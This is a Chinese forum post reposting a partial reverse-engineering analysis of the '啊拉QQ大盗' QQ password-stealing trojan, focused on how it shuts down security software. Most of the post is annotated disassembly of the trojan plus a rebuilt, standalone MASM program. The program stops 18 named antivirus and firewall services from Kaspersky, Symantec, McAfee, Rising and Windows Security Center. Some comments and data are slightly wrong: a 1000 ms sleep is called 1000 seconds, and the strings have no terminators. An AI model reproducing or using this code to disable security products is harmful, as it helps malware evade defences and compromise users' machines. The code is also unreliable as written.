123170071

诱惑犯罪

正式会员

策划者

贴子 1565

精华 0

积分 786

信用 0

竞猜 0

魅力 6

威望 0

现金 215 CZB

银行 11 CZB

黄金 0

比特币 0

注册时间 2007-12-17

发表于:2008-02-26 17:02:30   |  显示全部帖子   |  本帖随机奖励楼主:2 CZB   |  转账至  123170071

不完全逆向分析啊拉QQ大盗

不完全逆向分析啊拉QQ大盗
文章作者:asm[C.R.S.T]
信息来源:邪恶八进制信息安全团队
啊拉QQ大盗有几个部分,大家看一下他的功能:


运行后关闭QQ,安装后删除自身,过滤重复号码,彻底坠毁防火墙等等.其中我最感兴趣的还是看看啊拉QQ大盗是怎么坠毁防火墙的,故挑了重点对它进行逆向分析.这个服务端是加了个壳.我对脱壳白痴,所以叫冷血书生帮我脱了.废话少说,下面是反汇编代码:

Copy code
.shrink:0040A0AA          mov  eax, offset s_Rsccenter ; "RsCCenter"
.shrink:0040A0AF          call  sub_4095FC  ;干掉如下防火墙服务..  
.shrink:0040A0AF
.shrink:0040A0B4          mov  eax, offset s_Kvsrvxp ; "KVSrvXP"
.shrink:0040A0B9          call  sub_4095FC   
.shrink:0040A0B9
.shrink:0040A0BE          mov  eax, offset s_Kavsvc ; "kavsvc"
.shrink:0040A0C3          call  sub_4095FC   
.shrink:0040A0C3
.shrink:0040A0C8          mov  eax, offset s_Kpfwsvc ; "KPfwSvc"
.shrink:0040A0CD          call  sub_4095FC   
.shrink:0040A0CD
.shrink:0040A0D2          mov  eax, offset s_Kwatchsvc ; "KWatchSvc"
.shrink:0040A0D7          call  sub_4095FC   
.shrink:0040A0D7
.shrink:0040A0DC          mov  eax, offset s_Wscsvc ; "wscsvc"
.shrink:0040A0E1          call  sub_4095FC   
.shrink:0040A0E1
.shrink:0040A0E6          mov  eax, offset s_Sndsrvc ; "SNDSrvc"
.shrink:0040A0EB          call  sub_4095FC   
.shrink:0040A0EB
.shrink:0040A0F0          mov  eax, offset s_Ccproxy ; "ccProxy"
.shrink:0040A0F5          call  sub_4095FC   
.shrink:0040A0F5
.shrink:0040A0FA          mov  eax, offset s_Ccevtmgr ; "ccEvtMgr"
.shrink:0040A0FF          call  sub_4095FC   
.shrink:0040A0FF
.shrink:0040A104          mov  eax, offset s_Ccsetmgr ; "ccSetMgr"
.shrink:0040A109          call  sub_4095FC   
.shrink:0040A109
.shrink:0040A10E          mov  eax, offset s_Spbbcsvc ; "SPBBCSvc"
.shrink:0040A113          call  sub_4095FC   
.shrink:0040A113
.shrink:0040A118          mov  eax, offset s_SymantecCoreL ; "Symantec Core LC"
.shrink:0040A11D          call  sub_4095FC   
.shrink:0040A11D
.shrink:0040A122          mov  eax, offset s_Navapsvc ; "navapsvc"
.shrink:0040A127          call  sub_4095FC   
.shrink:0040A127
.shrink:0040A12C          mov  eax, offset s_Npfmntor ; "NPFMntor"
.shrink:0040A131          call  sub_4095FC   
.shrink:0040A131
.shrink:0040A136          mov  eax, offset s_Mskservice ; "MskService"
.shrink:0040A13B          call  sub_4095FC   
.shrink:0040A13B
.shrink:0040A140          mov  eax, offset s_Mctaskmanager ; "McTaskManager"
.shrink:0040A145          call  sub_4095FC   
.shrink:0040A145
.shrink:0040A14A          mov  eax, offset s_Mcshield ; "McShield"
.shrink:0040A14F          call  sub_4095FC   
.shrink:0040A14F
.shrink:0040A154          mov  eax, offset s_Mcafeeframewo ; "McAfeeFramework"
.shrink:0040A159          call  sub_4095FC   
.shrink:0040A159
.shrink:0040A15E
.shrink:0040A15E loc_40A15E:                  ; CODE XREF: .shrink:0040A16D j
.shrink:0040A15E          call  sub_409064
.shrink:0040A15E
.shrink:0040A163          push  0BB8h      
.shrink:0040A168          call  Sleep      ;休眠
.shrink:0040A168
.shrink:0040A16D          jmp  short loc_40A15E
.shrink:0040A16D
  很明显,通过一个参数传递给sub_4095FC这个分支,而这个参数正好是一些常见的杀毒软件服务名称.所以这个函数应该这样构造:char sub_4095FC(int buffer)(C语言语法)把这个名称传递给sub_4095FC干什么捏?大家请看sub_4095FC这个分支:

Copy code
.shrink:004095FC sub_4095FC    proc near      
.shrink:004095FC                          
.shrink:004095FC                          
.shrink:004095FC                          
.shrink:004095FC                          
.shrink:004095FC                          
.shrink:004095FC
.shrink:004095FC var_4      = dword ptr -4 ;传递进来的参数
.shrink:004095FC
.shrink:004095FC          push  ebp
.shrink:004095FD          mov  ebp, esp
.shrink:004095FF          push  ecx
.shrink:00409600          push  ebx
.shrink:00409601          push  esi
.shrink:00409602          push  edi
.shrink:00409603          mov  [ebp+var_4], eax
.shrink:00409606          mov  eax, [ebp+var_4]
.shrink:00409609          call  sub_403ED0
.shrink:00409609
.shrink:0040960E          xor  eax, eax
.shrink:00409610          push  ebp
.shrink:00409611          push  offset s_SUIL_YN@ ; "榕瀄xFF\xFF腽嬅_^[Y]脥@" (这里已经被加密)
.shrink:00409616          push  dword ptr fs:[eax]
.shrink:00409619          mov  fs:[eax], esp
.shrink:0040961C          mov  eax, [ebp+var_4]
.shrink:0040961F          call  sub_403EE0
.shrink:0040961F
.shrink:00409624          mov  esi, eax
.shrink:00409626          push  0F003Fh      ; dwDesiredAccess
.shrink:0040962B          push  0          ; lpDatabaseName
.shrink:0040962D          push  0          ; lpMachineName
.shrink:0040962F          call  OpenSCManagerA ; 打开服务管理器
.shrink:0040962F
.shrink:00409634          mov  edi, eax    ; 保存句柄到edi
.shrink:00409636          test  edi, edi    ; 是否打开成功?
.shrink:00409638          jbe  short loc_4096A8 ; 打开成功,继续执行,反之跳到这里
.shrink:00409638
.shrink:0040963A          push  0F01FFh      ; dwDesiredAccess
.shrink:0040963F          push  esi        ; lpServiceName
.shrink:00409640          push  edi        ; hSCManager
.shrink:00409641          call  OpenServiceA  ; 打开一个防火墙的服务
.shrink:00409641
.shrink:00409646          mov  esi, eax
.shrink:00409648          test  esi, esi
.shrink:0040964A          jbe  sh
ort loc_4096A2 ; 打开出错 关闭句柄
.shrink:0040964A
.shrink:0040964C          push  offset ServiceStatus ; lpServiceStatus
.shrink:00409651          push  1          ; dwControl
.shrink:00409653          push  esi        ; hService
.shrink:00409654          call  ControlService ; 停止人家的防火墙的服务
.shrink:00409654
.shrink:00409659          test  eax, eax
.shrink:0040965B          jz    short loc_4096A8
.shrink:0040965B
.shrink:0040965D          push  3E8h        ; dwMilliseconds
.shrink:00409662          call  Sleep      ; 休眠1000秒
.shrink:00409662
.shrink:00409667          jmp  short loc_40967C
.shrink:00409667
.shrink:00409669 ; ---------------------------------------------------------------------------
.shrink:00409669
.shrink:00409669 loc_409669:                  
.shrink:00409669          cmp  ServiceStatus.dwCurrentState,3 ;是否是SERVICE_STOP_PENDING状态
.shrink:00409670          jnz  short loc_40968B
.shrink:00409670
.shrink:00409672          push  3E8h        ; dwMilliseconds
.shrink:00409677          call  Sleep      ;休眠
.shrink:00409677
.shrink:0040967C
.shrink:0040967C loc_40967C:                  
.shrink:0040967C          push  offset ServiceStatus ; lpServiceStatus
.shrink:00409681          push  esi        ; hService
.shrink:00409682          call  QueryServiceStatus ; 查询设备驱动器的当前状态
.shrink:00409682
.shrink:00409687          test  eax, eax
.shrink:00409689          jnz  short loc_409669 ; 查询未成功,继续休泯,然后再查询
.shrink:00409689
.shrink:0040968B
.shrink:0040968B loc_40968B:                  
.shrink:0040968B          cmp  ServiceStatus.dwCurrentState, 1
.shrink:00409692          jz    short loc_4096A8 ; 对比是否收到控制代码SERVICE_STOP_PENDING
.shrink:00409692
.shrink:00409694          push  esi        ; hSCObject
.shrink:00409695          call  CloseServiceHandle ; 关闭这个服务
.shrink:00409695
.shrink:0040969A          push  edi        ; hSCObject
.shrink:0040969B          call  CloseServiceHandle
.shrink:0040969B
.shrink:004096A0          jmp  short loc_4096A8
.shrink:004096A0
.shrink:004096A2 ; ---------------------------------------------------------------------------
.shrink:004096A2
.shrink:004096A2 loc_4096A2:                  
.shrink:004096A2          push  edi        ; hSCObject
.shrink:004096A3          call  CloseServiceHandle ; 关闭打开服务管理器的句柄
.shrink:004096A3
.shrink:004096A8
.shrink:004096A8 loc_4096A8:                  
.shrink:004096A8                          
.shrink:004096A8                          
.shrink:004096A8                          
.shrink:004096A8          xor  eax, eax
.shrink:004096AA          pop  edx
.shrink:004096AB          pop  ecx
.shrink:004096AC          pop  ecx
.shrink:004096AD          mov  fs:[eax], edx
.shrink:004096B0          push  4096C5h ;
.shrink:004096B5          lea  eax, [ebp+var_4]
.shrink:004096B8          call  sub_403B68
.shrink:004096B8
.shrink:004096BD          retn
.shrink:004096BD
.shrink:004096BD sub_4095FC    endp ; sp = -18h

原来是通过连接服务器设备管理器来关闭服务,如果函数ControlService执行不成功的话,就关闭句柄退了出去,反之,查询一下ControlService函数关闭后管理器返回的ServiceStatus的结构成员dwCurrentState的值非SERVICE_STOP_PENDING的标志,就代表关闭成功,就可以关闭这个服务了.其实这是很简单的.

    下面就给出汇编源代码


Copy code

;******************************************************************
;程序编写by Asm
;日期:2007-3-07日
;出处:http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组(http://www.wolfexp.net/)
;注意事项:公布源码仅限技术交流,如果使用引起的损失,由使用者自己全部负责!
;*****************************************************************

.386
.model flat, stdcall
option casemap :none

include windows.inc
include kernel32.inc
include advapi32.inc

includelib kernel32.lib
includelib advapi32.lib

_CloseService PROTO :DWORD

.data
s_Rsccenter db "RsCCenter"
s_Kvsrvxp db "KVSrvXP"
s_Kavsvc db "kavsvc"
s_Kpfwsvc db "KPfwSvc"
s_Kwatchsvc db "KWatchSvc"
s_Wscsvc db "wscsvc"
s_Sndsrvc db "SNDSrvc"
s_Ccproxy db "ccProxy"
s_Ccevtmgr db "ccEvtMgr"
s_Ccsetmgr db "ccSetMgr"
s_Spbbcsvc db "SPBBCSvc"
s_SymantecCoreL db "Symantec Core LC"
s_Navapsvc db "navapsvc"
s_Npfmntor db "NPFMntor"
s_Mskservice db "MskService"
s_Mctaskmanager db "McTaskManager"
s_Mcshield db "McShield"
s_Mcafeeframewo db "McAfeeFramework"

.code
_CloseService proc _Service
local hSCManager:DWORD
local hService:DWORD
local ServiceStatus:SERVICE_STATUS
  invoke OpenSCManager,NULL,NULL, SC_MANAGER_CREATE_SERVICE ;连接服务管理器
  .if eax!=0
      mov  hSCManager, eax ;连接成功,返回一个句柄
  .elseif
  jmp ExitSCManager
  .endif
      invoke OpenService, hSCManager,_Service,0F01FFh ;打开服务
      .if eax!=0
        mov hService,eax
    .elseif
    jmp ExitSCManager
      .endif
      invoke ControlService,hService,SERVICE_CONTROL_STOP,addr ServiceStatus ;停止防火墙的服务
      .if eax == NULL
      jmp ExitSCManager
      .endif
      invoke Sleep,1000
      invoke QueryServiceStatus,hService,addr ServiceStatus ;查询返回的标志
      .if eax != NULL
      cmp ServiceStatus.dwCurrentState,SERVICE_STOP_PENDING ;获取SERVICE_STOP_PENDING标志代表关闭成功
jnz ColseIt
      .endif
      
ColseIt:
cmp ServiceStatus.dwCurrentState,1h
jz ExitSCManager
invoke CloseServiceHandle,hService
invoke CloseServiceHandle,hSCManager

ExitSCManager:
invoke CloseServiceHandle, hSCManager
invoke ExitProcess,NULL
_CloseService endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke _CloseService,addr s_Rsccenter
invoke _CloseService,addr s_Kvsrvxp
invoke _CloseService,addr s_Kavsvc
invoke _CloseService,addr s_Kpfwsvc
invoke _CloseService,addr s_Kwatchsvc
invoke _CloseService,addr s_Wscsvc
invoke _CloseService,addr s_Sndsrvc
invoke _CloseService,addr s_Ccproxy
invoke _CloseService,addr s_Ccevtmgr
invoke _CloseService,addr s_Ccsetmgr
invoke _CloseService,addr s_Spbbcsvc
invoke _CloseService,addr s_SymantecCoreL
invoke _CloseService,addr s_Navapsvc
invoke _CloseService,addr s_Npfmntor
invoke _CloseService,addr s_Mskservice
invoke _CloseService,addr s_Mctaskmanager
invoke _CloseService,addr s_Mcshield
invoke _CloseService,addr s_Mcafeeframewo
end start
我非英雄·广目无双·我本坏蛋·无限嚣张
楼主
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删主题    删主题    |